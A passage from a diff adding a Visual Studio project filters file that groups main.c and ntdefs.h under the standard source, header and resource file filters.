+      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
+      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
+    </Filter>
+    <Filter Include="Header Files">
+      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
+      <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
+    </Filter>
+    <Filter Include="Resource Files">
+      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
+      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
+    </Filter>
+  </ItemGroup>
+  <ItemGroup>
+    <ClCompile Include="main.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="ntdefs.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+  </ItemGroup>
+</Project>